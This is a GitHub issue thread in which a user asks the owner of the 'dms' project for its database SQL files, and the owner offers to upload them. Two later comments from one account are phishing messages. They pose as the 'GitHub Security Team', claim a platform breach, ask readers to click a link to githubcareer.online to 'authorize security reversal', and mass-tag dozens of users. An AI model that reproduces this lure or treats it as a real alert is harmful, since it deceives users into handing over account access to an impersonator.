### ISSUE TITLE
dms 

### ISSUE THREAD

**Issue by wmx-us** [YesYourHighness/dms#1]
Can you provide the DMS database file? thankyou!

**Comment by YesYourHighness** [comment]
The database is still there, but the front-end Vue project is missing. If you still need SQL files, I can upload them


------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "YesYourHighness/dms"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2022年1月6日(星期四) 下午5:19
***@***.***&gt;;
***@***.***&gt;;
主题:&nbsp;[YesYourHighness/dms] dms  (Issue #1)





 
Can you provide the DMS database file? thankyou!

**Comment by wmx-us** [comment]
yes,I need it . but  the  front-end  I can write it myself because I write the front end myself!
You can borrow your back end to refactor the project, thank you !

**Comment by wmx-us** [comment]
I could use your back end to refactor the project

**Comment by nickfnblum** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
epitaphial, @YanhuiJessica, @shusheng17, @mhly520, @witbelief, @AlexZhu1182, @starlyxxx, @aman-roy, @lirenjieArthur, @Caczhtus, @zm-stack, @DamianHayden, @MinghuiChen43, @egoistzty, @leuitong, @riazrooshan, @hamiecod, @ren-hq123, @tianshanghong, @CanoVerst

**Comment by nickfnblum** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
karlsbeard, @wally0327, @zhaoliushun, @xjn1999, @freshccc, @HeyAnduin, @CShiru, @ywy2090, @roudra323, @swinfant, @zhouchimin, @yutianwu, @zrlvwj1, @Xinchungeorb, @CNZedChou, @xumy29, @dddkyi, @xuzenghui1995, @Littlechickenleg, @ruojichong
